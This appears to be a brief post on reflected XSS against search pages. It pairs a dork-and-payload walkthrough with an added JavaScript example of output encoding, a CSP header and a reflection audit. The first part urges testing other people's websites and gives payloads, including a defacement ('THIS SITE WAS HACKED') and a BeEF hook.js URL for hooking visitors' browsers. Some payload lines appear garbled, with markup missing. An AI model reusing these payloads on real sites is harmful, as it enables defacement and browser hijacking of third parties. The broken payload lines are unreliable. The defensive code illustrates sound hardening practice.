BeEF XSS Exploitation Demonstration

[inurl:.com/search.asp]

1. Test another website by entering the code

TEST

or alert('x'); in the search box.
2. The result was shown as a heading title, but I'm not sure, then
3. View the selection source to make sure it's not just bold text
4. Check whether the query was processed by the server without filtering

Test:
a. alert('x');
b. document.body.innerHTML="body{visibility:hidden;}

THIS SITE WAS HACKED

";
c. 

TEST

BeEF XSS Query: Vulnerable XSS
http://127.0.0.1:3000/hook.js
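
What step 4 checks for, seen from the server side, as an added example that is not code from the original post: a search page renderer in its unfiltered form beside an output-encoded form, plus a check for raw reflection of the query. The function names, sample queries and header values are assumptions made for illustration.

```javascript
// Added example (hypothetical names): how a search page echoes the query.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the characters that can change the HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Unfiltered form: the query lands in element content and in an
// attribute value exactly as submitted, so markup in it is parsed.
function renderSearchUnsafe(query) {
  return '<p>Results for: ' + query + '</p>' +
         '<input name="q" value="' + query + '">';
}

// Hardened form: the same template, with the query encoded on output.
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return '<p>Results for: ' + q + '</p>' +
         '<input name="q" value="' + q + '">';
}

// Defense in depth (assumed policy): with script-src 'self' the browser
// refuses inline scripts and scripts hosted on any other origin.
const SECURITY_HEADERS = {
  'Content-Security-Policy': "default-src 'self'; script-src 'self'",
  'X-Content-Type-Options': 'nosniff',
};

// True when a query containing HTML metacharacters comes back unencoded.
function reflectsRawMarkup(html, query) {
  return /[&<>"']/.test(query) && html.includes(query);
}

// Constructed sample queries: heading markup, quotes, and plain text.
const SAMPLES = ['<h1>TEST</h1>', 'rock & "roll"', 'plain words'];

// Run every sample through a renderer and report raw reflection.
function audit(render) {
  return SAMPLES.map((s) => reflectsRawMarkup(render(s), s));
}

console.log('unsafe renderer reflects:', audit(renderSearchUnsafe));
console.log('safe renderer reflects:  ', audit(renderSearchSafe));
```

The same `audit` check works as a regression test: any template change that reintroduces raw reflection flips a result to `true`.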
